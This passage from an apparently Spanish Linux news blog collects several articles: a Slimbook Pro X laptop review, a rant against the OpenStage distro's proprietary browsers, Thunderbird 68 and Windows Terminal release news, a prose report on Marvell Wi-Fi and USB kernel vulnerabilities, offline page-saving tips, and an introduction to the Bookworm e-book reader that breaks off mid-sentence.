No se me olvida poner el precio. El Slimbook Pro X está a la venta desde 998 euros en su configuración básica, incluyendo 8 GB de RAM, SSD de 250 GB e Intel Dual Band 3165AC.

En cuanto a su disponibilidad, Slimbook está haciendo algo inaudito por estos lares con bastante éxito: vendiendo por adelantado. Anunciaron y pusieron a la venta el Pro X a finales de junio y entregaron las unidades a finales de julio, tal y como habían prometido. Entretanto, había agotado el stock y la historia se repite: se ha abierto otra ronda de pedidos que se servirán a principios de septiembre (a partir de septiembre debería también el modelo oscuro).

La experiencia Slimbook


Dejando a un lado el precio del hardware como tal, el valor que aportan marcas como Slimbook, System76, VANT, Entroware o la misma Dell con sus series dedicadas es el de garantizar la compatibilidad de sus equipos con Linux. Pero cada vez son más las que se atreven a pulir la presentación en todo lo posible. La experiencia Slimbook a la que he hecho referencia varias veces es algo en lo que llevan trabajando tiempo, y es en el Slimbook Pro X donde más se nota.

En esencia hablamos de una serie de extras de software con los que conformar una experiencia más rica y atractiva de cara al cliente. Para más datos, el Slimbook Pro X se puede comprar sin sistema operativo preinstalado, con Windows 10 o con Ubuntu, Kubuntu, Ubuntu MATE, Linux Mint, elementary OS, Manjaro, KDE neon o Zorin OS y además del sistema, uno se encuentra con varios añadidos.

Slimbook Face


Decía que es en el Slimbook Pro X en el que más se nota la experiencia Slimbook porque han desarrollado una aplicación específica para explotar una de las características de este equipo de las que han hecho causa: el reconocimiento facial.

«¿Cuántas veces al día tecleas tu contraseña en Linux? Para encender el ordenador, para instalar un programa, para actualizar, o para lanzar un comando con sudo por la terminal, etc. Pues ya no lo necesitarás. Con una segunda cámara biométrica, tu Slimbook Pro X podrá reconocer que eres tú el que está delante del ordenador, y validar tus ordenes«.

Así presentan esta novedosa característica de… ¿seguridad?, ¿comodidad? ¿Un poco de ambas? Sea como fuere, es una novedad curiosa que a mí no me ha terminado de convencer. Con la cámara biométrica y Slimbook Face el Slimbook Pro X goza de un reconocimiento facial mucho más potente y certero que el que podría ofrecer una webcam ordinaria, pero me temo que tienen que pulirlo más para que su uso sea confiable.

Lo he tenido instalado en todo momento y al principio, cual acto reflejo, cada vez que tenía que introducir la contraseña para iniciar sesión, lanzar un comando o lo que fuese me encontraba tecleando y viendo el parpadeo rojo de la cámara biométrica, que a veces acababa antes que yo. Ya acostumbrado, ahora soy yo el que se queda a veces esperando a que me reconozca y no lo consigue. Lo extraño es que me reconoce en situaciones con luz escasa, con barba o sin ella… pero de vez en cuando me arroja el fallo, tengo que introducir la contraseña… y me irrito. Advierten de estos percances, sí; lo que me escama es que lo mismo me reconoce con nada de luz, que me falla poniéndome en buenas condiciones.

Slimbook Face sigue en estado de desarrollo beta, así que estoy seguro de que mejorará porque es buena idea, solo que le falta pulir. ¿Hubiese sido mejor un lector de huellas? Esa es una discusión en la que no voy a entrar.

¡Ah!, lo de que «la experiencia Slimbook aún no está al alcance de todo el mundo» lo decía por esto: solo el Pro X puede presumir de esta característica.

Slimbook MakeUp


Otra de las aplicaciones propias de Slimbook, según me contaron, inspirada por las numerosas peticiones que tenían sobre el tema, es Slimbook MakeUp, la cual incluye varias opciones y temas de ventanas e iconos para personalizar la apariencia del escritorio con un clic. Sinceramente solo la usé para ver cómo era; soy de los que prefieren los defaults por dos motivos: ofrecen una mejor experiencia global y a estas alturas los temas por defecto de las principales distribuciones Linux se ven bastante bien. No encuentro la necesidad salvo que te aburras mucho y no es mi caso. Pero seguro que hay a quien le interesa.

Slimbook Battery


Y Slimbook Battery, sí, pero -siempre en mi opinión, como todo lo demás- lo que no han logrado con Face o MakeUp, con Battery lo están bordando. No voy a decir nada más de esta utilidad de lo que ya he dicho, porque le quiero dedicar un artículo aparte. Ahí lo dejo.

Para quien recuerde o tenga un Slimbook y conozca Slimbook Essentials, ha pasado a mejor vida porque las nuevas versiones de las distros han activado de una manera u otra lo que este ofrecía (optimizaciones de rendimiento, principalmente).

Conclusiones


Termino, aunque ya he adelantado la síntesis de las conclusiones en el titular: el Slimbook Pro X es impresionante por dentro y por fuera. A las pruebas me remito. Las pegas que se le pueden sacar al equipo como tal son pocas y las bondades las eclipsan. Por poner ejemplos concretos, la sensación que me ha dejado el tema del reconocimiento facial es agridulce, pero el puntazo de la NVIDIA lo compensa con creces. Lo sustancial del caso, y ahí es adonde voy, es que si el Slimbook Pro X no tuviese ni lo uno ni lo otro, seguiría siendo impresionante por dentro y por fuera.

De «lo nunca visto» a «el mejor portátil Linux del mundo en su categoría«, los reclamos publicitarios que ha utilizado Slimbook para promocionar su nuevo tope de gama son grandilocuentes, no cabe duda, pero no son falsos. Han hilado fino, porque al menos yo nunca había visto una mezcla de este tipo que se engloba… ¿en qué categoría? ¿Portátiles con Linux? ¿Ultraportátiles con Linux? ¿Ultraportátiles de 14 pulgadas en una caja de 12 pulgadas con sistema gráfico híbrido, cámara biométrica…? No sé si me seguís. Pero, repito, mola mucho que una pequeña empresa pueda sacar al mercado un producto de este nivel.

Este lanzamiento es un acierto total para Slimbook por mantenerse fieles a la potencia, conectividad y pulgadas de la serie PRO, pero mejorando la autonomía, así como aligerando el tamaño y peso al máximo. La cámara biométrica y la NVIDIA son golosinas por explotar en un producto que sin ellas ya es redondo. Junto al Dell XPS 13, el Slimbook Pro X se posiciona como uno de los mejores ultraportátiles que se puede encontrar hoy en día con Linux.

Lo mejor:
  • La construcción en general y lo ligerísimo que es
  • El haber podido ajustar una pantalla de 14 pulgadas en ese espacio
  • Habiendo señalado que la autonomía no es para mí un requisito clave… la NVIDIA dedicada :)
Lo peor:
  • Que no tenga un puerto Thunderbolt, lo hubiese bordado en conectividad
  • La «experiencia Slimbook» promete, pero está verde
  • Que no me lo pueda quedar

 

OpenStage: Una distribución española basada en Arch con navegadores privativos por defecto


Hace más de un mes recibí por correo electrónico una nota invitándome a conocer una distribución GNU/Linux basada en Arch con el escritorio KDE Plasma. Juro que fui enseguida a descargar la imagen ISO con toda la ilusión del mundo porque resume mis dos preferencias: Arch y Plasma. Preparé enseguida e impacientemente una máquina virtual para ponerme en seguida con ella y hacer una revisión.

Sin embargo, fue como si me hubiesen tirado una jarra de agua helada en pleno invierno: Venía con el navegador privativo Vivaldi preinstalado. Así, haciéndole asqueroso revés a nuestras alternativas libres tan excelentes como Firefox o Chromium, en el panel estaba orgullosa, un programa que no debería de estar ahí por defecto.

Lo denuncié hace poco cuando el tema de Manjaro, los nuevos desarrolladores de estas distribuciones están arruinando la filosofía abierta y libre de GNU/Linux. Unas veces por ignorancia y la mayoría de las veces por un puñado de dólares, están desplazando el software libre por aplicaciones privativas. Sí, decid lo que queráis, pero esto es vergonzoso, una patada tremenda, traicionera y vil al software libre. Un cáncer que se está propagando con el beneplácito de la mayoría de los medios, con su silencio, cuando no un apoyo abierto, a tan descarado ataque al software libre. Un insulto a nuestra filosofía del código abierto.

Quien me envió el correo anunciando el lanzamiento tuvo mi respuesta: Que lo anunciara en otros sitios porque este blog es sólo software libre. La respuesta fue que “bueno.. era una beta.. todavía estaban probando..”

He esperado este tiempo y hoy he decidido echar un nuevo vistazo. He visto que ahora tienen una versión Openrc y otra Systemd. Me he descargado las dos. La Systemd sigue con Vivaldi y la Openrc con.. Opera.

Antes de que me llamen “tóxico” de nuevo por denunciar estas asquerosas prácticas, tengo que decir una cosa. Tóxico es el/lo que contamina el cuerpo o la materia, o el medio. Ahora sólo pensad quienes están contaminando GNU con el software privativo. Yo puedo ser una espinita clavada en la poca dignidad de muchos, una cantaor de las 40, pero a GNU que no me lo toquen. Y también me podéis llamar talibán por quitarle las máscaras y descubrir las intenciones de esos desarrolladores, que no es otra que quitarnos el software libre de las distros por defecto para infectarnos con código cerrado y peligroso. Que yo no me voy a enfadar porque me llamen talibán o extremista. Me enfado cuando quieren contaminar GNU por cuatro perras.

Por cierto, a los desarrolladores de OpenStage ya que habéis decidido olvidar los navegadores libres por ese software cerrado, esto que tenéis puesto está de más, se está engañando a la gente que creemos en el software libre:



Quitad lo de la licencia GNU/GPL3 porque es falso. Si no queréis respetar Linux, allá vosotros y allá Linus, pero a GNU se le respeta. No ensucien ese nombre con ninguna aplicación asquerosamente cerrada.

 

Entre distros rolling, semi-rolling y estables (Opinión)


Las actualizaciones son -casi- siempre una buena cosa. Por un lado, puedes recibir correcciones de seguridad de un programa, o novedades que esa aplicación ha implementado. Es por ello, sobre todo por el primer punto, que debemos de tener nuestro sistema siempre actualizado.

Hay distribuciones que las novedades las aparcan a un lado y sólo actualizan correcciones de seguridad, como es el caso de Debian. También existen distros cuyas actualizaciones son constantes, como por ejemplo, Arch GNU/Linux y ofrecen tanto parches de seguridad como paquetes nuevos. Y por último están las distribuciones semi-rolling, que se actualizan con relativa frecuencia, como Kaos y Ubuntu.

Siempre tengo que dejar claro que este blog es personal y no busca una neutralidad, porque no es un medio informativo -aunque en verdad en los medios informativos la neutralidad siempre está ausente- sino que vierto mis opiniones.

Soy usuario común de distribuciones rolling o en todo caso, semi-rolling, jamás de sistemas estables como Debian y derivadas, ¿por qué?

Lo que más me gusta de Debian es su contrato social. Al igual que lo que menos me gusta de Arch es su principio KISS. Debian es la mejor distribución GNU/Linux para entornos de producción y servidores por su fortaleza y estabilidad, pero si te gusta usar aplicaciones actualizadas con nuevos aportes, olvídate. Desde el navegador web hasta un programa como Audacity, tienes que apañarte con versiones antiguas. Estables, sí, pero lo que ganas en estabilidad, pierdes en innovaciones. Claro, podrías introducir el repositorio Testing o Inestable y quizás obtener algo más nuevo, pero ya no hablaríamos de Debian Estable. También tienes la opción de compilar lo más nuevo.

Siempre puedes preferir usar programas probadamente estables como los de Debian en un escritorio porque no confíes en una aplicación actualizada. Eso es completamente respetable.

Por otro lado tenemos a las distribuciones rolling release como Arch, Slackware o Gentoo. Son distros más difíciles de instalar, usar y mantener pero por regla general, suelen ser más rápidas que las estables y sobre todo más actualizadas.

Esto es un dilema para el usuario, ¿prefiere lo viejo pero estable o lo más nuevo pero quizás no tan estable? Aquí la fama se la lleva Debian, pues es rarísimo que falle algo. Pero tengo que hacer una puntualización: En los años que llevo usando distros Arch, jamás he conocido un cierre inesperado o un error interno en una aplicación. He leído que algunos usuarios han tenido problemas con la actualización de su controlador de tarjeta gráfica y han puesto a parir a Arch, pero eso no es exclusivo de las distros rolling. Al menos lo he vivido con Fedora y OpenSUSE, que no son precisamente rolling -exceptuando a Tumbleweed-.

Como alternativa a una Debian o una Arch, tenemos las distribuciones semi-rolling como Kaos, Tromjaro o Ubuntu. Todas ellas tienen un sistema de paquetes que se actualizan con frecuencia pero algo más probados y no frenéticamente como Arch. Son actualizaciones más pausadas, por lo que pueden resultar idóneas para la mayoría de usuarios que no se decantan por los programas antiguos ni los más nuevos.

Yo, como dije más arriba, siempre uso distros rolling o semi. Me gusta tener las aplicaciones actualizadas, no quiero perderme las implementaciones que los desarrolladores introducen. Por ejemplo, KDE Plasma, ¿merece la pena tener la versión 5.14 en lugar de la 5.16? Claro, habemos gente para todo, pero en innegable que la mayoría tendemos a usar lo más nuevo y así disfrutar de las novedades.

 

Por fin Thunderbird es actualizado


Nos temíamos lo peor, después de tanto tiempo sin nuevas versiones de Thunderbird. El cliente de correo más potente dentro del software libre lleva años a la deriva pero después de muchos meses de trabajo, la versión 68.0 de Mozilla Thunderbird finalmente está aquí, trayendo muchas nuevas características y mejoras. Los aspectos más destacados incluyen la capacidad de marcar todas las carpetas de una cuenta de correo electrónico como leídas, la mejora del registro de filtros y la compatibilidad con la ejecución periódica de filtros, la compatibilidad con TCP para mantener activo el protocolo IMAP, así como la compatibilidad con la autenticación OAuth2 para Yandex.

También es nueva la capacidad de vincular a los archivos adjuntos en un correo electrónico en lugar de cargarlos, la compatibilidad con la selección de paquetes de idiomas en Opciones Avanzadas, un motor de políticas que permite implementaciones empresariales personalizadas de Thunderbird mediante un archivo JSON multiplataforma o Windows Group Policy, y la compatibilidad completa con Unicode para interfaces MAPI, incluido MAPISendMailW.

Mozilla Thunderbird 68.0 también añade un paquete MSI y un instalador de 64 bits para sistemas Windows, la capacidad de seleccionar idiomas individuales para revisar la ortografía en cada conversación de chat, soporte para cambios de datos de zonas horarias pasados y futuros en el calendario, soporte para temas y diccionarios de WebExtension, una interfaz de usuario renovada cuando se instalan complementos y un nuevo menú de aplicaciones al estilo hamburguesa.

Ahora con un diseño unificado de una sola columna, el nuevo menú de aplicaciones se dice que hace un mejor uso de los iconos y separadores `para reducir el desorden’.

Los aficionados a Thunderbird también deben estar atentos a la “animación durante la navegación por los elementos del menú”. Esto, dice Ryan Sipes, Director de la Comunidad Thunderbird, ofrece “una experiencia más atractiva” al hacer que el menú parezca “más receptivo y moderno”.

Siguiendo con los cambios en la interfaz de usuario, Opciones/Preferencias ahora se abre como una pestaña separada dentro de la interfaz de Thunderbird en lugar de un cuadro de diálogo. El tema oscuro incorporado se ha ampliado para incluir un hilo en el panel de mensajes oscuro.

Otros aspectos destacados son la mejora de la gestión de archivos adjuntos y la posibilidad de volver a vincular las transferencias Filelink cargadas anteriormente.

Otra característica interesante de la versión 68.0 de Mozilla Thunderbird es la posibilidad de proteger los datos de tu perfil contra una actualización no deseada o accidental utilizando la opción “–allow-downgrade” cuando inicias la aplicación y aparece el mensaje “You have launched an older version of Thunderbird” (Has lanzado una versión anterior de Thunderbird).

Otras mejoras dignas de mención incluyen un aumento del umbral de autocompactación de 20 MB a 200 MB, mejores advertencias sobre correos con posibles estafas, mejor detección de intentos de phishing, varias mejoras en los temas, mejoras en la interfaz de usuario para archivos adjuntos externos e independientes, y el cuadro de diálogo de eventos en el Calendario, así como muchas correcciones de errores que se pueden ver en las notas de la versión.

Mozilla Thunderbird 68.0 está disponible para descargar ahora mismo para los sistemas operativos GNU/Linux, macOS y Windows desde thunderbird.net. Una OTA (Over-the-Air) aún no está disponible, por lo que los usuarios existentes podrán actualizar de esa manera, desde Thunderbird 60 o versiones anteriores, cuando la versión 68.1 de Mozilla Thunderbird esté disponible.

 

Lanzada la cuarta versión preview de Windows Terminal




Durante la edición de 2019 de su Developers Build Conference, Microsoft aprovecho para presentar la nueva interfaz de la línea de comandos de Windows llamada Windows Terminal. Luego, Microsoft explicó que está diseñado para ser la ubicación central para el acceso a entornos como PowerShell, Cmd y Windows Subsystem for Linux (WSL). Los desarrolladores pueden personalizarlo de varias maneras y agregarle temas y extensiones.

La primera vista previa de la nueva Terminal de Windows apareció en junio pasado. Fue seguido por una segunda vista previa en julio. Mientras que durante este mes de agosto, Microsoft ha publicado no una, sino dos previews de Windows Terminal: la tercera vista previa a principios de mes y más recientemente Windows Terminal Preview v0.4, la cuarta versión disponible recientemente en Microsoft Store y GitHub.

(adsbygoogle = window.adsbygoogle || []).push({});

Microsoft tiene la intención de lanzar la versión final 1.0 de su nueva utilidad este invierno y, mientras tanto, las previsiones deberían seguir rápidamente.

Esta nueva vista previa de Windows Terminal Microsofr destaca que tiene nuevas características añadidas, tales como el soporte para múltiples pestañas, poder colocar imágenes de fondo, así como poder controlar la opacidad de los esquemas de fondo y color, y más.

La configuración se almacena en archivos JSON. Tambien se incluyen las definiciones de los métodos abreviados de teclado, el número inicial de filas y columnas, la configuración de la fuente y el comando que se ejecutará al abrir una nueva pestaña.

(adsbygoogle = window.adsbygoogle || []).push({});

La cuarta vista previa de Windows Terminal también presenta nuevas características y una de las más importantes es probablemente la colocar el texto en HTML.

Ahora, cuando se selecciona un rango de texto y se copia en el portapapeles, el Terminal escribe el texto seleccionado en el portapapeles en formato HTML.

Esto le permitirá al usuario poder pegar contenido de este tipo hacia otras aplicaciones como por ejemplo Microsoft Outlook o Word. El portapapeles siempre copiará los datos HTML con el texto normal.



También Microsoft recalca que se debe tener en cuenta que el archivo profiles.json se ha movido de la carpeta RoamingState a la carpeta LocalState para evitar que la configuración se migre automáticamente a sus otros dispositivos y resuelva algunos problemas que provocan el bloqueo del dispositivo.

Además, si hay un problema con su archivo profiles.json, el dispositivo mostrará un mensaje de error que describe lo que está mal. Si su archivo profiles.json no se puede leer correctamente, el dispositivo usará su configuración predeterminada. Sin embargo, no reemplazará su archivo de configuración existente.

En la versión v0.3, Microsoft introdujo el parámetro “tabTitle” que permitía a los usuarios establecer el título de la pestaña para cada perfil en la configuración.

La aplicación de esta configuración anula el título de la pestaña que proporciona el Shell del perfil. Microsoft ha cambiado esta característica en la versión 0.4.

De ahora en adelante, el título de la pestaña se definirá de manera predeterminada en el nombre del perfil en lugar de en la ruta del ejecutable. Si el usuario desea cambiar lo que se usa como título predeterminado, basta con que use tabTitle para reemplazar el nombre del perfil en la pestaña.

Para aclarar, el título del shell es el título proporcionado por la aplicación de línea de comando que se utiliza dentro de la instancia del perfil. Esto significa que la aplicación de línea de comandos aún podrá sobrescribir el título de la pestaña.

Otro de los cambios que se destacan es que ahora en esta nueva versión se puede usar las combinaciones de teclas que incluyen “AltGr, Ctrl y Alt”.

Pues ahora en esta nueva preview 4 ahora se detecta la tecla AltGr antes de la funcionalidad de vinculación de teclas, por lo que está disponible para los usuarios.

La combinación de teclas predeterminada que se proporciona con esta versión para abrir la lista desplegable es “Ctrl + Shift + Space”.

Finalmente si quieres saber más al respecto sobre el lanzamiento de esta nueva vista previa de la Windows Terminal puedes consultar el siguiente enlace.

https://www.linuxadictos.com/lanzada-la-cuarta-version-preview-de-windows-terminal.html

 

Identificadas varias vulnerabilidades en el Kernel de Linux en controladores USB y Wifi Marvell




Uno de los mitos más conocidos por la red acerca de Linux es el clasico “Linux es seguro y no tiene vulnerabilidades”, pero la cosa es que esto es totalmente falso ya que los errores tanto críticos como menores sobre Linux se dan a conocer (no al momento sino después de haber sido solucionados).

Y tal el caso de que recientemente se dio a conocer la noticia de que fueron identificadas tres vulnerabilidades en el controlador para dispositivos inalámbricos basados en chips Marvell ( CVE-2019-14814 , CVE-2019-14815, CVE-2019-14816) que podrían conducir a la escritura de datos fuera del búfer asignado al procesar paquetes especialmente formateados enviados a través de la interfaz netlink .

(adsbygoogle = window.adsbygoogle || []).push({});

Sobre las vulnerabilidades de Marvell


Para el caso de CVE-2019-14814 se trata de un desbordamiento en la función mwifiex_set_uap_rates () del controlador Marvell Wifi en el kernel de Linux
El problema está dentro de mwifiex_set_uap_rates () en drivers /net/wireless/marvell/mwifiex/uap_cmd.c.

Hay dos llamadas de memcpy en esta función para copiar el elemento WLAN_EID_SUPP_RATES y WLAN_EID_EXT_SUPP_RATES sin verificar la longitud. El búfer dst bss_cfg-> rates es una matriz de longitud MWIFIEX_SUPPORTED_RATES.

(adsbygoogle = window.adsbygoogle || []).push({});

Los dos elementos en cfg80211_ap_settings son del espacio del usuario.
Mientras que para el caso de CVE-2019-14815 este es un desbordamiento en la función mwifiex_set_wmm_params () en el kernel de Linux
El problema está dentro de mwifiex_set_wmm_params () en drivers /net/wireless/marvell/mwifiex/ uap_cmd.c.

mwifiex_set_wmm_params () llama a memcpy para copiar el elemento WLAN_OUI_MICROSOFT en

bss_cfg-> wmm_info sin verificar la longitud.

bss_cfg-> wmm_info es el tipo struct mwifiex_types_wmm_info.
CVE-2019-14816 de igual forma que los anteriores es un desbordamiento de mwifiex_update_vs_ie () en el kernel de Linux
El problema está dentro de mwifiex_update_vs_ie () en drivers /net/wireless/marvell/mwifiex/ie.c.

mwifiex_set_mgmt_beacon_data_ies () analiza los IEs de baliza, los IEs de respuesta de sonda,

IE de respuesta de asociación de cfg80211_ap_settings-> beacon, llamará a mwifiex_update_vs_ie () dos veces por cada IEs si existen IEs.

Para beacon_ies como ejemplo, en la primera llamada, mwifiex_update_vs_ie () alloc y luego copia el elemento WLAN_OUI_MICROSOFT a ie-> ie_buffer,

ie-> ie_buffer esta una matriz de longitud IEEE_MAX_IE_SIZE (256); sobre la egunda llamada, mwifiex_update_vs_ie () copia el elemento WLAN_OUI_WFA que se ha asignado previamente. Si la suma de la longitud de los dos elementos es mayor que IEEE_MAX_IE_SIZE, provocará un desbordamiento del búfer.
Los problemas pueden ser explotados por un usuario local para causar un bloqueo del núcleo en los sistemas que usan tarjetas inalámbricas Marvell.

Tampoco se descarta la posibilidad de que una persona mal intencionada pueda explotar estas vulnerabilidades para aumentar sus privilegios en el sistema.

De momento estos problemas siguen sin corregirse (aun que ya fueron dados a conocer ya hace varios dias) en las distribuciones (Debian, Ubuntu, Fedora, RHEL, SUSE).

Aun que ya se ha propuesto un parche para su inclusión en el Kernel de Linux para las próximas versiones.

Vulnerabilidades en los controladores USB


Andrey Konovalov de Google descubrió 15 vulnerabilidades en los controladores USB ofrecidos en el kernel de Linux.

Esta es la segunda parte de los problemas encontrados durante las pruebas fuzzing: en 2017, este investigador encontró 14 vulnerabilidades más en la pila USB.

Los problemas pueden explotarse potencialmente cuando se conectan dispositivos USB especialmente preparados en una computadora.

Un ataque es posible si hay acceso físico al equipo y puede provocar al menos un bloqueo del Kernel, pero no se excluyen otras manifestaciones (por ejemplo, para una vulnerabilidad similar identificada en 2016, el controlador USB snd-usbmidi logró preparar un exploit para ejecutar código a nivel del kernel).

De los 15 problemas, 13 ya se han solucionado en las actualizaciones actuales del Kernel de Linux, pero dos vulnerabilidades (CVE-2019-15290, CVE-2019-15291) permanecen sin corregir en la última versión 5.2.9.

Las vulnerabilidades sin parches podrían conducir a la desreferenciación del puntero NULL en los controladores ath6kl y b2c2 al recibir datos incorrectos del dispositivo.

Otras vulnerabilidades incluyen:
  • Acceso a áreas de memoria ya liberadas (use-after-free) en los controladores v4l2-dev / radio-raremono, dvb-usb, sound / core, cpia2 y p54usb;
  • Memoria doble libre (doble libre) en el controlador rio500;
  • Desreferencia de puntero NULL en controladores yurex, zr364xx, siano / smsusb, sisusbvga, line6 / pcm, motu_microbookii y line6.

https://www.linuxadictos.com/identificadas-varias-vulnerabilidades-en-el-kernel-de-linux-en-controladores-usb-y-wifi-marvell.html

 

Thunderbird 68 incluye importantes mejoras estéticas




En los últimos días fue anunciado el lanzamiento de Thunderbird 68.0 para GNU/Linux, Windows y Mac, la última versión del conocido cliente de correo Open Source desarrollado por Mozilla.

Tras años de cierto desinterés por parte de Mozilla, parece que el cliente de correo ha remontado el vuelo en lo que respecta a su desarrollo, si bien el hecho de ser un producto muy maduro y basado en la tecnología de Firefox ESR hace que a través de los lanzamientos no se incluyan una gran cantidad de novedades.

Sin embargo, en esta ocasión estamos ante una nueva versión mayor, así que es de esperar alguna novedad de interés, y desde Mozilla se han esforzado para que así sea. Lo primero que destaca de Thunderbird 68 es la actualización del menú principal de la aplicación, que ahora está unificado y ha sido refinado para mostrarse ahora en una única columna, siendo ahora muy parecida a la utilizada por Firefox actualmente.



Las Preferencias de la aplicación han sido movidas a una pestaña, siguiendo así el camino que Firefox recorrió hace años. La nueva disposición de las preferencias resulta más ordenada y autoexplicativa que la anterior, que se cargaba en nueva ventana y mostraba una interfaz un tanto obsoleta para los tiempos actuales.



Thunderbird cuenta ahora con soporte a todo color en toda la aplicación. Esto significa que se puede cambiar el color del texto en un correo electrónico al que se desee utilizar, permitiendo establecer etiquetas para los tonos preferidos del usuario.



El tema oscuro ha sido mejorado con un panel de hilo de mensaje oscuro, así como otras pequeñas mejoras que ayudan a ofrecer una experiencia más consistente.



Se han incluido más opciones para la gestión de los ficheros adjuntos, permitiendo ahora desajuntar un archivo adjunto para almacenarlo en una carpeta diferente mientras se mantiene un enlace desde el correo electrónico a la nueva ubicación. También se puede abrir la carpeta que contiene un archivo separado a través de la opción “Abrir la carpeta que lo contiene”.



Por último, los ficheros adjuntos mediante Filelink que ya han sido subidos pueden ser enlazados de nuevo sin tener que volver a subirlos, además de no requerirse una cuenta para usar el proveedor por defecto de Filelink: WeTransfer.

Otras novedades de interés son la autenticación OAuth2 para Yandex, un instalador para Windows 64-bit, ejecución periódica y mejora del registro de filtros, el poder marcar todas las carpetas de una cuenta como leídas, la adición de un motor de políticas para implementaciones personalizadas de Thunderbird en empresas y soporte completo de Unicode para las interfaces MAPI.

Como vemos, Thunderbird 68 incluye un puñado de novedades interesantes que ayudan a mejorar la aplicación desde el punto de vista estético, si bien igualmente este seguirá luciendo algo anticuado frente a Evolution (aplicación perteneciente a GNOME), su gran rival en el espectro GNU/Linux. Los detalles completos se pueden consultar en la correspondiente entrada en el blog de Mozilla y las notas de lanzamiento.
https://www.muylinux.com/2019/08/29/thunderbird-68/

 

Cómo guardar páginas web para leerlas sin conexión de las maneras más sencillas




Esta tarde hemos publicado un artículo que hablaba sobre Bookworm, un lector de libros electrónicos para Linux muy interesante. Hemos terminado el artículo a modo de broma diciendo que tiene el fallo de no servir para leer este blog, a no ser que guardemos el artículo para leerlo sin conexión. Hay mucha gente interesada en esto, en poder leer artículos sin conexión, y muchos de ellos no saben cómo guardar páginas web para leerlas más tarde, no sin depender de internet. En este artículo os enseñaremos las maneras más sencillas.

Porque sí, existen extensiones como Drag to Save para Firefox, pero no soy un gran fan de instalar software si no es estrictamente necesario. Además, navegadores como el de Mozilla nos permiten guardar páginas web de diferentes maneras “out of the box”, es decir, por defecto. Uno de los métodos es tan sencillo que llega a sorprender. El otro, también sencillo, es exportar la página web a PDF, algo que podemos hacer desde el menú de impresión.

(adsbygoogle = window.adsbygoogle || []).push({});

Guardar páginas web arrastrándolas al escritorio


Este método es el más sencillo, pero no funciona en todos los sistemas operativos/entornos gráficos. Sí funciona en Plasma + Firefox, y no puede ser más sencillo y rápido:
  • El proceso es el mismo que usamos para guardar una URL en la barra de marcadores. El primer paso es marcar la URL.
  • Con la URL seleccionada, hacemos clic sobre ella y arrastramos la URL al escritorio.
  • En otros entornos en los que funcione, soltamos, sin más. En Plasma, donde hay opciones concretas, elegimos “Copiar aquí”. Lo que guardará será un documento HTML, pero uno más simple sin carpetas ni decenas de archivos.
Para abrirlo, podemos hacer doble clic sobre él y se abrirá en el navegador por defecto. Otra opción es abrirlo en algún editor de texto, como LibreOffice Writer, pero lo que veremos en este caso no será tan perfecto como si lo abrimos con el navegador.

Un método similar a este es ir al menú “Guardar como…” y guardar la página web como HTML, pero en este caso nos creará el archivo HTML junto a una carpeta llena de archivos que no podemos eliminar si queremos que todo se vea perfectamente.

(adsbygoogle = window.adsbygoogle || []).push({});

Exportar una web a PDF


La otra opción de la que os hablaba que sí funciona en cualquier sistema operativo, prácticamente cualquier navegador web y en la que no hay que instalar nada extra es exportar la página web a PDF. El proceso es sencillo:
  • Con la página web que queramos guardar abierta, vamos a las opciones de impresión. En Firefox y en Chrome está en la opción “Imprimir” que veremos en la “hamburguesa” o los tres puntos. En ambos casos, el atajo del teclado es Ctrl+P.
  • Ahora tenemos que guardar la página como PDF. En Chromium es más sencillo, puesto que es la opción que aparece marcada por defecto y solo tenemos que hacer un clic más en “Guardar”. En Firefox es parecido, siempre y cuando no tengamos ninguna impresora conectada: en el apartado de impresoras, elegimos “Imprimir a un archivo” y luego “Imprimir”. Por defecto, el archivo se guarda como mozilla.pdf en nuestra carpeta personal.

Copiar y pegar en Writer




Otra manera sencilla es copiar la página entera y pegarla en un editor de textos compatible con imágenes, hipervínculos, fuentes, etc. Lo haríamos siguiendo estos pasos:
  • En la página web, presionamos Ctr+A para seleccionarlo todo.
  • A continuación, presionamos Ctrl+C para copiar la página web.
  • Abrimos, por ejemplo, LibreOffice Writer, instalado por defecto en muchas distribuciones Linux.
  • Presiomamos Ctrl+V para pegar la página web.
  • Bonus: lo que obtendremos con este método es bastante aceptable, con los defectos de que las imágenes pueden ser demasiado grandes y que veremos un cuadro alrededor de prácticamente todo, pero podemos editarlo lo que queramos desde el mismo Writer. Una vez lo tengamos a nuestro gusto, guardamos el archivo. Si lo exportamos a PDF, lo que obtendremos es más que aceptable. Si solo nos interesa el artículo sin florituras, siempre podemos hacer lo explicado en este método desde el modo lector del navegador.
La mejor opción, siempre teniendo en cuenta que no queremos instalar software extra ni complicarnos mucho la vida, es exportar las páginas a PDF desde el mismo navegador. Los PDF son compatibles con todo tipo de visores de documentos y lectores de libros electrónicos, como el Bookworms del que os hablábamos al principio de este artículo que SÍ sirve para leer Linux Adictos.

https://www.linuxadictos.com/como-guardar-paginas-web-para-leerlas-sin-conexion-de-las-maneras-mas-sencillas.html

 

Bookworm, el lector de eBooks que todo devorador de libros debería tener instalado


Cuando Daniel Foré creó elementary OS, una de las cosas que tenía en mente era crear un sistema operativo basado en Linux que se pareciera mucho a macOS. Cualquiera que lo haya probado se habrá dado cuenta de que lo ha conseguido: su interfaz es sencilla y visualmente atractiva, algo a lo que contribuyen las aplicaciones que se han creado pensando en el sistema operativo que ha hecho famoso el entorno gráfico Pantheon. Una de estas aplicaciones es un Bookworm que recuerda mucho al Apple Books que hasta hace bien poco era conocido como iBooks,

Bookworm es un lector de eBooks, pero también tiene funciones de biblioteca. Esto significa que no solo podremos leer los libros electrónicos con esta app, sino que también se almacenarán y ordenarán como veis en la captura que encabeza este artículo. Si el libro tiene una portada que el software pueda detectar, lo que veremos será como si estuviéramos en una librería. Si la portada no existe o no se puede detectar, Bookworm creará una genérica con el título del libro.

(adsbygoogle = window.adsbygoogle || []).push({});

Bookworm, de elementary OS a tu PC con Linux


Ahora mismo, Bookworm va por la versión v.1.1.2 y es compatible con estos formatos:
  • EPUB.
  • PDF.
  • MOBI.
  • FB2.
  • CBR.
  • CBZ.
Bookworm nos ofrece todas las funciones de configuración que podamos desear, como cambiar el tamaño del texto, cambiar la fuente (incluso cargar las nuestras), controlar el espaciado entre líneas y márgenes, realizar anotaciones o un modo oscuro.



Si estáis interesados en probarlo, hay disponible un paquete Flatpak en este enlace y en este otro enlace está la versión para openSUSE. También está disponible desde repositorio:

(adsbygoogle = window.adsbygoogle || []).push({});
sudo add-apt-repository ppa:bookworm-team/bookworm
sudo apt-get update
sudo apt-get install com.github.babluboy.bookworm
Su desarrollador dice que usando el repositorio anterior podemos encontrarnos con problemas de dependencias, ahora o en el futuro, en cuyo caso recomienda instalar el repositorio de elementary OS con este comando:
